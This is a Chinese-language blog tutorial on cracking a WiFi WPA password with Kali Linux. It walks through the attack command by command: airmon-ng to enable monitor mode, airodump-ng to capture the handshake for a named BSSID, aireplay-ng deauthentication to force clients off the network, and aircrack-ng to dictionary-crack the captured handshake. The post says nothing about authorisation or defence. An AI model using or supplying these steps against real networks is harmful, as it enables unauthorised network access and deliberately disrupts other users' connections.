kali爆破wifi密码
煤矿路口西 Lv4

kali爆破wifi密码


该方法的核心思想即通过监听模式去捕获周围的无线信号,对指定的路由器展开攻击,强行断开连接。那么与他连接的设备会尝试重新连接,此时的数据包被我们捕获到后,再通过字典爆破匹配该信号的密码。

查看网卡

ifconfig

本来的网络状态

0

插上网盘之后

airmon-ng start wlan0

1

进行校验

2

出现了wlan0mon

扫描当前环境中的wifi

airodump-ng wlan0mon

直到第二行出现[PMKID found: xxx(BSSID)]或[WPA handshake:xxx(BSSID)]时

表明获取到了包含WPA-PSK密码的此握手数据报文

3

重点观察此处橙色标记

  • BSSID  AP端的mac地址
  • PWR 信号强度(绝对值越小,信号越强)
  • Data 对应路由器的在线数据吞吐量,数值越大,数值上传量越大
  • CH 对应路由的频道
  • ESSID 对应路由器的名称

接下来我们观察此AP(BSSID是否)同时在下面两部分出现

抓取wifi数据包

airodump-ng -c 1 --ivs -w IDP --bssid 90:E7:10:24:43:F1 wlan0mon

4

这个终端用以捕获按 BSSID 过滤的数据,并仅保存捕获的ivs再进行重命名

我们可以看到这个终端始终处于接收状态,等待捕获符合的数据

强制重连

aireplay-ng -0 0 -a 90:E7:10:24:43:F1 -c 9C:5A:81:71:15:B7 wlan0mon

5

等指定BSSID和指定STATION的Frames积累到差不多20000以上后,

开始爆破

aircrack-ng -w <指定字典路径> <握手包路径>

6

7

得到了wifi的密码

  • 本文标题:kali爆破wifi密码
  • 本文作者:煤矿路口西
  • 创建时间:2021-10-04 16:28:00
  • 本文链接:http://www.mklkx.xyz/2021/10/04/kali爆破wifi密码/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!